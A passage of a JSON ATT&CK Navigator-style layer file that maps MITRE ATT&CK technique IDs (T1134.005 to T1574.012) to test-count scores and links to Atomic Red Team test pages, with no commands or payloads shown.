Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":74,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":41,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.004","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":86,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":43,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View 